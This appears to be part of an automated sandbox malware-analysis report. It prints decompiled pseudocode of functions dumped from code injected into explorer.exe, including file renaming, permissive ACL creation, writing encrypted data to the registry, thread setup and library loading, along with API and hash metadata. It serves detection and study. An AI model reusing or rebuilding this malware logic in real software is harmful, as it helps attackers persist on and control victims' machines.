                  • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00086DA0(void* __eflags, void* __fp0) {
                  				short _v536;
                  				WCHAR* _v544;
                  				WCHAR* _t9;
                  				intOrPtr _t10;
                  				intOrPtr _t11;
                  				void* _t22;
                  				void* _t32;
                  				intOrPtr _t34;
                  				intOrPtr _t35;
                  				intOrPtr _t41;
                  				intOrPtr _t43;
                  				intOrPtr _t46;
                  				intOrPtr _t49;
                  				void* _t51;
                  				void* _t53;
                  				void* _t56;
                  				WCHAR* _t59;
                  				signed int _t60;
                  				void* _t62;
                  				void* _t63;
                  				void* _t74;
                  
                  				_t74 = __fp0;
                  				_t34 =  *0x9e778; // 0xe7fc18
                  				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                  				_t51 = 0x31;
                  				_t32 = 1; // executed
                  				_t9 = E00089ED0(_t34, _t51); // executed
                  				if(_t9 != 0) {
                  					_t10 =  *0x9e78c; // 0x0
                  					_t66 = _t10;
                  					if(_t10 == 0) {
                  						_t49 =  *0x9e688; // 0xb0000
                  						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
                  						 *0x9e78c = _t10;
                  					}
                  					_push(0);
                  					_push(_t10);
                  					_t11 =  *0x9e688; // 0xb0000
                  					_push(L"\\c");
                  					_t9 = E000892E5(_t11 + 0x438);
                  					_t59 = _t9;
                  					_t63 = _t62 + 0x10;
                  					_v544 = _t59;
                  					if(_t59 != 0) {
                  						while(1) {
                  							_t35 =  *0x9e688; // 0xb0000
                  							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
                  							if(_t56 == 0) {
                  								break;
                  							}
                  							if(E0008B269(_t59) == 0) {
                  								_t32 = E0008F14F(_t59, 0x1388, _t74);
                  							}
                  							E0008A4DB(_t56);
                  							_t41 =  *0x9e684; // 0xe7f8f0
                  							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                  							if(_t32 > 0) {
                  								E0008980C( &_v544);
                  								_t43 =  *0x9e778; // 0xe7fc18
                  								_t53 = 0x33;
                  								if(E00089ED0(_t43, _t53) != 0) {
                  									L12:
                  									__eflags = E00081C68(_t59, __eflags, _t74);
                  									if(__eflags >= 0) {
                  										E0008B1B1(_t59, _t53, __eflags, _t74);
                  										continue;
                  									}
                  								} else {
                  									_t46 =  *0x9e778; // 0xe7fc18
                  									_t53 = 0x12;
                  									_t22 = E00089ED0(_t46, _t53);
                  									_t72 = _t22;
                  									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
                  										_push(E0008980C(0));
                  										E00089640( &_v536, 0x104, L"%s.%u", _t59);
                  										_t63 = _t63 + 0x14;
                  										MoveFileW(_t59,  &_v536);
                  										continue;
                  									} else {
                  										goto L12;
                  									}
                  								}
                  							}
                  							break;
                  						}
                  						_t9 = E0008861A( &_v544, 0xfffffffe);
                  					}
                  				}
                  				return _t9;
                  			}


                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileMove
                  • String ID: %s.%u
                  • API String ID: 3562171763-1288070821
                  • Opcode ID: a525183aa4c469eae1840a01f978e8047c8302b96d23d5477b9ca8207e9639b5
                  • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                  • Opcode Fuzzy Hash: a525183aa4c469eae1840a01f978e8047c8302b96d23d5477b9ca8207e9639b5
                  • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00082AEA() {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				CHAR* _v16;
                  				signed int _t16;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				void* _t26;
                  				void* _t29;
                  				signed int _t31;
                  				intOrPtr _t36;
                  				CHAR* _t38;
                  				intOrPtr _t39;
                  				void* _t40;
                  
                  				_t15 =  *0x9e710 * 0x64;
                  				_t39 = 0;
                  				_v12 =  *0x9e710 * 0x64;
                  				_t16 = E00088604(_t15);
                  				_t38 = _t16;
                  				_v16 = _t38;
                  				if(_t38 != 0) {
                  					_t31 =  *0x9e710; // 0x2
                  					_t36 = 0;
                  					_v8 = 0;
                  					if(_t31 == 0) {
                  						L9:
                  						_push(_t38);
                  						E00089F48(0xe); // executed
                  						E0008861A( &_v16, _t39);
                  						return 0;
                  					}
                  					_t29 = 0;
                  					do {
                  						_t21 =  *0x9e714; // 0xe7fe88
                  						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                  							if(_t39 != 0) {
                  								lstrcatA(_t38, "|");
                  								_t39 = _t39 + 1;
                  							}
                  							_t22 =  *0x9e714; // 0xe7fe88
                  							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                  							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                  							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                  							_t31 =  *0x9e710; // 0x2
                  							_t40 = _t40 + 0x18;
                  							_t36 = _v8;
                  							_t39 = _t39 + _t26;
                  						}
                  						_t36 = _t36 + 1;
                  						_t29 = _t29 + 0x20;
                  						_v8 = _t36;
                  					} while (_t36 < _t31);
                  					goto L9;
                  				}
                  				return _t16 | 0xffffffff;
                  			}


                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcat
                  • String ID: %u;%u;%u
                  • API String ID: 3011335133-2973439046
                  • Opcode ID: 946761fa361e4782b62cb9bc1aa85043aca340f47d39fdfad85715e4e5e56c64
                  • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                  • Opcode Fuzzy Hash: 946761fa361e4782b62cb9bc1aa85043aca340f47d39fdfad85715e4e5e56c64
                  • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E0008BD10() {
                  				char _v8;
                  				void* _v12;
                  				char _v16;
                  				short _v20;
                  				char _v24;
                  				short _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				void _v96;
                  				intOrPtr _t58;
                  				intOrPtr _t61;
                  				intOrPtr _t63;
                  				intOrPtr _t65;
                  				intOrPtr _t67;
                  				intOrPtr _t70;
                  				intOrPtr _t73;
                  				intOrPtr _t77;
                  				intOrPtr _t79;
                  				intOrPtr _t81;
                  				intOrPtr _t85;
                  				intOrPtr _t87;
                  				signed int _t90;
                  				void* _t92;
                  				intOrPtr _t93;
                  				void* _t98;
                  
                  				_t90 = 8;
                  				_v28 = 0xf00;
                  				_v32 = 0;
                  				_v24 = 0;
                  				memset( &_v96, 0, _t90 << 2);
                  				_v20 = 0x100;
                  				_push( &_v12);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_v16 = 0;
                  				_push(0);
                  				_v8 = 0;
                  				_push(1);
                  				_v12 = 0;
                  				_push( &_v24);
                  				_t58 =  *0x9e68c; // 0xe7fab8
                  				_t98 = 0;
                  				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                  					L14:
                  					if(_v8 != 0) {
                  						_t67 =  *0x9e68c; // 0xe7fab8
                  						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                  					}
                  					if(_v12 != 0) {
                  						_t65 =  *0x9e68c; // 0xe7fab8
                  						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                  					}
                  					if(_t98 != 0) {
                  						_t63 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                  					}
                  					if(_v16 != 0) {
                  						_t61 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                  					}
                  					L22:
                  					return _t98;
                  				}
                  				_v68 = _v12;
                  				_t70 =  *0x9e688; // 0xb0000
                  				_t92 = 2;
                  				_v96 = 0x1fffff;
                  				_v92 = 0;
                  				_v88 = 3;
                  				_v76 = 0;
                  				_v72 = 5;
                  				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                  					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                  						goto L7;
                  					}
                  					goto L4;
                  				} else {
                  					L4:
                  					_push( &_v8);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(1);
                  					_push(_t92);
                  					_push(_t92);
                  					_push( &_v32);
                  					_t85 =  *0x9e68c; // 0xe7fab8
                  					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                  						goto L14;
                  					} else {
                  						_t87 = _v8;
                  						if(_t87 != 0) {
                  							_push(2);
                  							_pop(1);
                  							_v64 = 0x1fffff;
                  							_v60 = 1;
                  							_v56 = 3;
                  							_v44 = 0;
                  							_v40 = 1;
                  							_v36 = _t87;
                  						}
                  						L7:
                  						_push( &_v16);
                  						_push(0);
                  						_push( &_v96);
                  						_t73 =  *0x9e68c; // 0xe7fab8
                  						_push(1); // executed
                  						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                  							goto L14;
                  						}
                  						_t98 = LocalAlloc(0x40, 0x14);
                  						if(_t98 == 0) {
                  							goto L14;
                  						}
                  						_t93 =  *0x9e68c; // 0xe7fab8
                  						_push(1);
                  						_push(_t98);
                  						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                  							goto L14;
                  						}
                  						_t77 =  *0x9e68c; // 0xe7fab8
                  						_push(0);
                  						_push(_v16);
                  						_push(1);
                  						_push(_t98);
                  						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                  							goto L14;
                  						}
                  						if(_v8 != 0) {
                  							_t81 =  *0x9e68c; // 0xe7fab8
                  							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                  						}
                  						_t79 =  *0x9e68c; // 0xe7fab8
                  						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                  						goto L22;
                  					}
                  				}
                  			}


                  APIs
                  • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocEntriesLocal
                  • String ID:
                  • API String ID: 2146116654-0
                  • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                  • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                  • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                  				char* _v12;
                  				char _v16;
                  				int _v20;
                  				signed int _v24;
                  				intOrPtr _v28;
                  				char* _v32;
                  				char _v52;
                  				char _v64;
                  				char _v328;
                  				char _v2832;
                  				signed int _t48;
                  				signed int _t49;
                  				char* _t54;
                  				long _t73;
                  				long _t80;
                  				long _t83;
                  				intOrPtr _t84;
                  				void* _t88;
                  				char* _t89;
                  				intOrPtr _t90;
                  				void* _t103;
                  				void* _t104;
                  				char* _t106;
                  				intOrPtr _t107;
                  				char _t108;
                  
                  				_t48 = __ecx;
                  				_t89 = __edx;
                  				_v24 = __ecx;
                  				if(_a4 == 0 || _a8 == 0) {
                  					L13:
                  					_t49 = _t48 | 0xffffffff;
                  					__eflags = _t49;
                  					return _t49;
                  				} else {
                  					_t115 = __edx;
                  					if(__edx == 0) {
                  						goto L13;
                  					}
                  					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                  					_push(_t107);
                  					_t103 = 4;
                  					_v12 = __edx;
                  					_v28 = E0008D400( &_v12, _t103);
                  					_t93 = _t107 + __edx;
                  					E00092301(_t107 + __edx,  &_v2832);
                  					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                  					_t108 = _a8;
                  					_v12 = _t54;
                  					_v20 = _t54 + 6 + _t108;
                  					_t106 = E00088604(_t54 + 6 + _t108);
                  					_v32 = _t106;
                  					if(_t106 != 0) {
                  						 *_t106 = _a12;
                  						_t16 =  &(_t106[6]); // 0x6
                  						_t106[1] = 1;
                  						_t106[2] = _t108;
                  						E000886E1(_t16, _a4, _t108);
                  						_t21 = _t108 + 6; // 0x6
                  						E000922D3( &_v2832, _t21 + _t106, _v12);
                  						_v16 = _t89;
                  						_t90 = _v24;
                  						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                  						_push( &_v52);
                  						_t104 = 8;
                  						E0008F490( &_v16, _t104);
                  						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
                  						E0008EB2E(_t106, _v20,  &_v328);
                  						_t73 = E00089B0E(_t90);
                  						_v12 = _t73;
                  						__eflags = _t73;
                  						if(_t73 != 0) {
                  							E000897A0(_v28,  &_v64, 0x10);
                  							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                  							__eflags = _t80;
                  							if(_t80 == 0) {
                  								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                  								__eflags = _t83;
                  								if(_t83 != 0) {
                  									_push(0xfffffffc);
                  									_pop(0);
                  								}
                  								_t84 =  *0x9e68c; // 0xe7fab8
                  								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
                  							} else {
                  								_push(0xfffffffd);
                  								_pop(0);
                  							}
                  							E0008861A( &_v12, 0xffffffff);
                  						}
                  						E0008861A( &_v32, 0);
                  						return 0;
                  					}
                  					_t88 = 0xfffffffe;
                  					return _t88;
                  				}
                  			}


                  APIs
                    • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapOpen_ftol2_sse
                  • String ID:
                  • API String ID: 3756893521-0
                  • Opcode ID: 8fae462dafa039357b5de8ecdcc521ea70c86f379729c64d31f576329faea8f7
                  • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                  • Opcode Fuzzy Hash: 8fae462dafa039357b5de8ecdcc521ea70c86f379729c64d31f576329faea8f7
                  • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _t45;
                  				intOrPtr _t46;
                  				intOrPtr _t48;
                  				intOrPtr _t49;
                  				void* _t52;
                  				intOrPtr _t53;
                  				intOrPtr _t54;
                  				struct _SECURITY_ATTRIBUTES* _t58;
                  				intOrPtr _t59;
                  				intOrPtr _t61;
                  				intOrPtr _t65;
                  				intOrPtr _t66;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				struct _SECURITY_ATTRIBUTES* _t73;
                  				intOrPtr _t74;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				intOrPtr _t79;
                  				intOrPtr _t82;
                  				intOrPtr _t83;
                  				void* _t86;
                  				intOrPtr _t87;
                  				intOrPtr _t89;
                  				signed int _t92;
                  				intOrPtr _t97;
                  				intOrPtr _t98;
                  				int _t106;
                  				intOrPtr _t110;
                  				signed int _t112;
                  				signed int _t113;
                  				void* _t115;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v8 = __edx;
                  				_v12 = __ecx;
                  				_t77 =  *0x9e76c; // 0x1cc
                  				_t73 = 0;
                  				if(E0008A4BF(_t77, 0x7530) >= 0) {
                  					_t45 =  *0x9e770; // 0xe7aac0
                  					_t112 = 0;
                  					_t106 = 0;
                  					do {
                  						_t78 =  *((intOrPtr*)(_t106 + _t45));
                  						if(_t78 == 0) {
                  							L6:
                  							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                  								_t113 = _t112 << 5;
                  								if(_v8 == _t73) {
                  									 *(_t113 + _t45 + 0x10) = _t73;
                  									_t46 =  *0x9e770; // 0xe7aac0
                  									 *(_t113 + _t46 + 0xc) = _t73;
                  									L14:
                  									_t79 =  *0x9e770; // 0xe7aac0
                  									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                  									_t48 =  *0x9e770; // 0xe7aac0
                  									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                  									_t49 = E0008A471(0, 1);
                  									_t82 =  *0x9e770; // 0xe7aac0
                  									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                  									_t83 =  *0x9e770; // 0xe7aac0
                  									_t30 = _t83 + _t113 + 4; // 0xe7aac4
                  									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
                  									_t53 =  *0x9e770; // 0xe7aac0
                  									 *(_t113 + _t53) = _t52;
                  									_t54 =  *0x9e770; // 0xe7aac0
                  									_t86 =  *(_t113 + _t54);
                  									if(_t86 != 0) {
                  										SetThreadPriority(_t86, 0xffffffff);
                  										_t87 =  *0x9e770; // 0xe7aac0
                  										 *0x9e774 =  *0x9e774 + 1;
                  										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                  										_t74 =  *0x9e770; // 0xe7aac0
                  										_t73 = _t74 + _t113;
                  									} else {
                  										_t59 =  *0x9e684; // 0xe7f8f0
                  										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                  										_t61 =  *0x9e770; // 0xe7aac0
                  										_t37 = _t61 + 0xc; // 0xe7aacc
                  										_t91 = _t37 + _t113;
                  										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                  											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                  											_t61 =  *0x9e770; // 0xe7aac0
                  										}
                  										_t92 = 8;
                  										memset(_t113 + _t61, 0, _t92 << 2);
                  									}
                  									L19:
                  									_t89 =  *0x9e76c; // 0x1cc
                  									E0008A4DB(_t89);
                  									_t58 = _t73;
                  									L20:
                  									return _t58;
                  								}
                  								_t110 = _a4;
                  								_t65 = E00088604(_t110);
                  								_t97 =  *0x9e770; // 0xe7aac0
                  								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                  								_t66 =  *0x9e770; // 0xe7aac0
                  								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                  									goto L19;
                  								}
                  								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                  								_t67 =  *0x9e770; // 0xe7aac0
                  								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                  								_t115 = _t115 + 0xc;
                  								goto L14;
                  							}
                  							goto L7;
                  						}
                  						_t69 =  *0x9e684; // 0xe7f8f0
                  						_push(_t73);
                  						_push(_t78);
                  						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                  							_t45 =  *0x9e770; // 0xe7aac0
                  							goto L7;
                  						}
                  						_t98 =  *0x9e770; // 0xe7aac0
                  						E0008984A(_t106 + _t98, 0);
                  						_t45 =  *0x9e770; // 0xe7aac0
                  						goto L6;
                  						L7:
                  						_t106 = _t106 + 0x20;
                  						_t112 = _t112 + 1;
                  					} while (_t106 < 0x1000);
                  					goto L19;
                  				}
                  				_t58 = 0;
                  				goto L20;
                  			}

                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69a52a97fa06ec0ebfc4b2f853e0b20ccf40f5a3777bb8dbbbb77bd88de68a89
                  • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                  • Opcode Fuzzy Hash: 69a52a97fa06ec0ebfc4b2f853e0b20ccf40f5a3777bb8dbbbb77bd88de68a89
                  • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr _t29;
                  				intOrPtr _t34;
                  				intOrPtr* _t39;
                  				void* _t47;
                  				intOrPtr _t55;
                  				intOrPtr _t58;
                  				char _t60;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t50 = _a4;
                  				_t60 = 0;
                  				_v12 = 0;
                  				if(_a4 != 0) {
                  					_t47 = E0008A63B(_t50);
                  					if(_t47 == 0) {
                  						L11:
                  						_t26 = 0;
                  						L12:
                  						L13:
                  						return _t26;
                  					}
                  					_t27 =  *0x9e684; // 0xe7f8f0
                  					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                  					if(_t58 == 0) {
                  						L9:
                  						_t29 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                  						if(_t60 != 0) {
                  							E0008861A( &_v12, 0);
                  						}
                  						goto L11;
                  					}
                  					_t4 = _t58 + 1; // 0x1
                  					_t34 = E00088604(_t4); // executed
                  					_t60 = _t34;
                  					_v12 = _t60;
                  					if(_t60 == 0) {
                  						goto L9;
                  					}
                  					_a4 = _a4 & 0;
                  					_push(0);
                  					_v8 = 0;
                  					_push( &_a4);
                  					_push(_t58);
                  					_push(_t60);
                  					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                  						if(_a4 == 0) {
                  							if(_v8 != _t58) {
                  								goto L9;
                  							}
                  							_t39 = _a8;
                  							 *((char*)(_t58 + _t60)) = 0;
                  							if(_t39 != 0) {
                  								 *_t39 = _t58;
                  							}
                  							CloseHandle(_t47);
                  							_t26 = _t60;
                  							goto L12;
                  						}
                  						_t55 = _v8 + _a4;
                  						_a4 = _a4 & 0x00000000;
                  						_push(0);
                  						_push( &_a4);
                  						_v8 = _t55;
                  						_push(_t58 - _t55);
                  						_push(_t55 + _t60);
                  					}
                  					goto L9;
                  				}
                  				_t26 = 0;
                  				goto L13;
                  			}

                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                  • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,00E7FD30,00000400), ref: 0008A776
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseFileHandleRead
                  • String ID:
                  • API String ID: 2331702139-0
                  • Opcode ID: c553b62fb3b61c4507a951b772411a711dc832c41c1f77446b10b71353d2c502
                  • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                  • Opcode Fuzzy Hash: c553b62fb3b61c4507a951b772411a711dc832c41c1f77446b10b71353d2c502
                  • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 76%
                  			E0008153B(void* __ecx, void* __edx) {
                  				void* _v8;
                  				void* _t3;
                  				signed int _t4;
                  				intOrPtr _t7;
                  				signed int _t9;
                  				intOrPtr _t10;
                  				void* _t24;
                  
                  				_push(__ecx);
                  				_t3 = CreateMutexA(0, 0, 0);
                  				 *0x9e6f4 = _t3;
                  				if(_t3 == 0) {
                  					L11:
                  					_t4 = _t3 | 0xffffffff;
                  					__eflags = _t4;
                  				} else {
                  					_t3 = CreateMutexA(0, 0, 0);
                  					 *0x9e6dc = _t3;
                  					if(_t3 == 0) {
                  						goto L11;
                  					} else {
                  						_t3 = E00081080(0x4ac);
                  						_v8 = _t3;
                  						if(_t3 == 0) {
                  							goto L11;
                  						} else {
                  							 *0x9e6e8 = E000891A6(_t3, 0);
                  							E000885C2( &_v8);
                  							_t7 = E00088604(0x100);
                  							 *0x9e6f0 = _t7;
                  							if(_t7 != 0) {
                  								 *0x9e6fc = 0;
                  								_t9 = E00088604(0x401);
                  								 *0x9e6d4 = _t9;
                  								__eflags = _t9;
                  								if(_t9 != 0) {
                  									__eflags =  *0x9e6c0; // 0x0
                  									if(__eflags == 0) {
                  										E000915B6(0x88202, 0x8820b);
                  									}
                  									_push(0x61e);
                  									_t24 = 8;
                  									_t10 = E0008E1BC(0x9bd28, _t24); // executed
                  									 *0x9e6a0 = _t10;
                  									_t4 = 0;
                  								} else {
                  									_push(0xfffffffc);
                  									goto L5;
                  								}
                  							} else {
                  								_push(0xfffffffe);
                  								L5:
                  								_pop(_t4);
                  							}
                  						}
                  					}
                  				}
                  				return _t4;
                  			}

                  APIs
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateMutex$AllocateHeap
                  • String ID:
                  • API String ID: 704353917-0
                  • Opcode ID: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
                  • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                  • Opcode Fuzzy Hash: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
                  • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 47%
                  			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                  				char _v8;
                  				char _t5;
                  				struct HINSTANCE__* _t7;
                  				void* _t10;
                  				void* _t12;
                  				void* _t22;
                  				void* _t25;
                  
                  				_push(__ecx);
                  				_t12 = __ecx;
                  				_t22 = __edx;
                  				_t5 = E000895C7(_a4);
                  				_t25 = 0;
                  				_v8 = _t5;
                  				_push(_t5);
                  				if(_a4 != 0x7c3) {
                  					_t7 = LoadLibraryA(); // executed
                  				} else {
                  					_t7 = GetModuleHandleA();
                  				}
                  				if(_t7 != 0) {
                  					_t10 = E0008E171(_t12, _t22, _t7); // executed
                  					_t25 = _t10;
                  				}
                  				E000885C2( &_v8);
                  				return _t25;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
